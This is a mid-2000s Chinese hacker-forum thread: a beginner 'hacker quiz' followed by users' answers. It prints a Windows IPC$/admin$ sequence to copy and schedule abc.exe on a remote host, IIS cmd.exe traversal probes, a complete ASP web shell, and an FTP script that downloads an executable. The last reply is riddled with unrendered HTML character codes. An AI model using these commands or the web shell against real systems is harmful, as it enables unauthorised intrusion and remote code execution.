黑客驗卷

天殺孤星

一份黑客菜鳥試卷，歡迎各位朋友作答，有獎賞哦，快點加油哦﹗


一、
http://192.168.0.1
http://xyz.3322.org
http://3232235521
三個連接指向同一目標網站，那么它們分別是什麼意義？

二、
常用端口識別
20 21 23
25 80 110
139 443 445

三、
試述下列命令作用
c:>net use 211.87.194.121ipc$ “123456”/user:”administrator”
c:>net use z: 211.87.194.121c$
c:>net time 211.87.194.121
c:>copy abc.exe 211.87.194.121admin$system32

四、
試述下列命令的區別，如何防止該命令在本地或遠程營運
c:>at 211.87.194.121 21:05 abc.exe
c:>at 21:05 211.87.194.121admin$system32abc.exe

五、
W3SVC日誌是什麼？分析下面這段日誌。
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /MSADC/root.exe /c+dir 403 -
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /c/winnt/system32/cmd.exe /c+dir 401 -
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /d/winnt/system32/cmd.exe /c+dir 401 -
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /HEAD 200 -
分析我酌情給分。

六、
netstat命令有何作用，舉出兩個參數進行說明。

七、
試述木馬的一些基本特徵。

八、
如何利用腳本實現對ftp的自動操作？

九、
下面是一個ASP木馬，請找出支持這一程式的關鍵點。
<%@ Language=VBScript %>
<%

Dim oScript
Dim oScriptNet
Dim oFileSys, oFile
Dim szCMD, szTempFile

On Error Resume Next

Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")

szCMD = Request.Form(".CMD")
If (szCMD <> "") Then

szTempFile = "C:" & oFileSys.GetTempName( )
Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
End If
%>
<HTML>
<BODY>
<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name=".CMD" size=45 value="<%= szCMD %>">
<input type=submit value="Run">
</FORM>
<PRE>
<%
If (IsObject(oFile)) Then
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
Call oFileSys.DeleteFile(szTempFile, True)
End If
%>
</BODY>
</HTML>

十、
存在IIS或CGI漏洞，並對腳本有執行權限，如何進行入侵？（只要求敘述到如何上傳文件，其他思路會酌情給分）
那么，如何在不打補丁的情況下避免這種攻擊的發生？

十一、OSI模型中哪一層上有協議？分別是什麼？

十二、觀察ping命令的返回包的TTL值，可以了解到什麼？

十三、從通訊閘得到采樣
目標 IP 192.168.0.1 端口80 源 IP　192.168.0.3 端口 3646
目標 IP 192.168.0.1 端口80 源 IP　192.168.0.3 端口 3647
目標 IP 192.168.0.1 端口69 源 IP　192.168.0.3 端口 69
請問 這可能是什麼樣的會話，採用什麼協議，進行什麼樣的作業？

十四、談談你對hacker和網路安全的認識

$靚仔龍$呵�

　　我５係咁識黑客ｄ野～～獻醜同請指教

1. 
   
2. 一、
   
3. [url]http://192.168.0.1[/url]
   
4. [url]http://xyz.3322.org[/url]
   
5. [url]http://3232235521[/url]

複製代碼

　　有毒網？？？

1. 
   
2. [url]http://192.168.0.1[/url]

複製代碼

　　ｉｐ？？

1. 
   
2. c:>net use 211.87.194.121ipc$ “123456”/user:”administrator”
   

複製代碼

　　解決忘記ｗｉｎｄｏｗｓ使用者密碼？？

1. 　六、
   
2. netstat命令有何作用，舉出兩個參數進行說明。

複製代碼

　

　　知道自己ｉｐ同咩軟體連緊

1. 十四、談談你對網路安全的認識

複製代碼

  　  不明來歷網站，ｍａｉｌ不要開，同不要收取／打開不明來歷的附件

天殺孤星

$靚仔龍$呵呵  在 2005-6-17 06:25 PM 發表:

　　我５係咁識黑客ｄ野～～獻醜同請指教

1. 
   
2. 一、
   
3. [url]http://192.168.0.1[/url]
   
4. [url]http://xyz.3322.org[/url]
   
5. [url]http://3232235521[/url]

複製代碼

　　有毒網？？？
[code]
[url]http://192 ...

除十四外 全部錯曬

天殺孤星

一、

一&#20010;是IP 一&#20010;是域名
第三&#20010;是十&#36827;制的
二、
常用端口&#35782;&#21035;
20        文件&#20256;&#36755;&#21327;&#35758;
21        文件&#20256;&#36755;&#21327;&#35758;，也就是FTP
23        telnet &#32456;端仿真&#21327;&#35758;
25        smtp &#31616;&#21333;&#37038;件&#21457;送&#21327;&#35758;
80        全球信息网超文本&#20256;&#36755;&#21327;&#35758;
110       Pop3 服&#21153;器
139       win98 共享&#36164;源端口
443       安全服&#21153;
445       不知道是什么&#19996;西（不好意思）
三、
&#35797;述下列命令作用
c:>net use 211.87.194.121ipc$ “123456”/user:”administrator”
用&#25143;admininistrator密&#30721;123456登&#24405;211.87.194.121 ipc$ 口子
c:>net use z: 211.87.194.121c$
把211.87.194.121 主机的C&#30424;映到本地Z&#30424;
c:>net time 211.87.194.121
看&#23545;方主机的系&#32479;&#26102;&#38388;
c:>copy abc.exe 211.87.194.121admin$system32
把本地&#24403;前目&#24405;的abc.exe复制到&#23545;方WINNTsystem32下
四、
&#35797;述下列命令的&#21306;&#21035;，如何防止&#35813;命令在本地或&#36828;程&#36816;行
c:>at 211.87.194.121 21:05 abc.exe
是在&#23545;方系&#32479;&#26102;&#38388;下的
c:>at 21:05 211.87.194.121admin$system32abc.exe
是在本地&#26102;&#38388;下
禁用WEBSHELL可以吧
五、
W3SVC日志是什么？分析下面&#36825;段日志。
好象是有人在2002-11-24 11:38:54&#36816;行了cmd，并用看了C&#30424;
六、
netstat命令有何作用，&#20030;出&#20004;&#20010;&#21442;&#25968;&#36827;行&#35828;明。
如C:>netstat/?
可以得到&#24110;助。因&#20026;&#26174;示的太多了，我就不打出&#26469;了，就&#35828;&#20004;&#20010;了
-a Displays all connections and listening ports.
-e Displays Ethe
et statistics. This may be combined with the -s
option.

七、
&#35797;述木&#39532;的一些基本特征。
1.具有&#38544;蔽性
2.括极&#24378;的破坏性
3.自身保&#25252;性
4.&#24378;大的&#36828;程控制功能
5.兼容性&#24378;
6.有客&#25143;端和服&#21153;端
7.客&#25143;端&#23545;服&#21153;端有&#26435;限
8.自&#21160;&#36816;行
9.&#36824;有吧，我不知道了

八、

C:>echo open 211.87.216.131 >c:ftp.txe
C:>echo user:user@211.87.216.131 >>c:ftp.txt
C:>echo get abc.exe >>c:ftp.txt
C:>echo bye >>c:ftp.txt
C:>ftp –s:c:ftp.txt
可以吧？
九、
下面是一&#20010;ASP木&#39532;，&#35831;找出支持&#36825;一程序的&#20851;&#38190;&#28857;。
是&#36825;&#20010;吧Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
十存在IIS或CGI漏洞，并&#23545;&#33050;本有&#25191;行&#26435;限，如何&#36827;行入侵？（只要求&#21465;述到如何上&#20256;文件，其他思路&#20250;酌情&#32473;分）

不太&#20250;，我只&#20250;ASP和ASP+PHP
十一
&#35848;&#35848;你&#23545;hacker和网&#32476;安全的&#35748;&#35782;
HACKER，中文是黑客，我听&#36807;一句&#35805;“想真正成&#20026;黑客，你必&#39035;真&#26538;&#23454;&#24377;去做黑客&#24212;&#35813;做的事情。”所以不是&#19987;&#38376;搞破坏的，而是&#23545;网&#32476;安全清楚的一种人，不侵入或破坏主机；不&#24694;意破坏任何系&#32479;；不破化&#21035;人的&#36719;件或&#36164;料，我也很同意&#21035;人&#35828;一切信息都&#24212;&#35813;是免&#36153;的，我就是因&#20026;&#36825;&#20010;&#21160;机，才&#23398;的，我&#20250;&#20005;格遵守守&#21017;，另外中&#22269;的法律在健全，&#35831;不要&#38543;意做破坏网&#32476;的事，也希望大家一&#26679;，&#35874;&#35874;